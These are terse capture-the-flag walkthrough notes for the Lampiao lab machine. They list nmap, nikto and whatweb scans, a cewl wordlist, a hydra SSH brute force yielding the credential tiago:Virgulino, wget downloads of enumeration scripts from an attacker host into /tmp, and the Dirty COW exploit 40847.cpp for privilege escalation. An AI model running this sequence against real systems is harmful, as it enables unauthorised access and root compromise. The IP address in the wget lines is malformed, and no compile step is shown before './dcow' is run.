nmap -A -p- -oA lampiao 192.168.213.48 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA lampiao 192.168.213.48

nmap -sU -O -p- -oA lampiao-udp 192.168.213.48

nikto -h 192.168.213.48 :80

Pasted image 20210915133013.png

Pasted image 20210915133209.png

http://192.168.213.48:1898

Pasted image 20210915150428.png

whatweb http://192.168.213.48:1898

Pasted image 20210915150520.png

http://192.168.213.48/CHANGELOG.txt

Pasted image 20210915150634.png

cewl 'http://192.168.213.48:1898/?q=node/1' -w pass.txt

Pasted image 20210915155322.png

hydra -l tiago -P pass.txt ssh://192.168.213.48 -t 4

credenciales tiago:Virgulino

Pasted image 20210915160120.png

python3 -m http.server 80

cd /tmp

wget http://192.49.152/lse.sh

https://github.com/jondonas/linux-exploit-suggester-2

wget http://192.49.152/linux-exploit-suggester-2.pl

Pasted image 20210915161626.png

chmod +x linux-exploit-suggester-2.pl

./linux-exploit-suggester-2.pl

Pasted image 20210915162300.png

searchsploit -m 40847.cpp

wget http://192.49.152/40847.cpp

Pasted image 20210915162841.png

chmod 755 40847.cpp

./dcow

Pasted image 20210915163419.png

boxes

copyright©2022 Cu3rv0x all rights reserved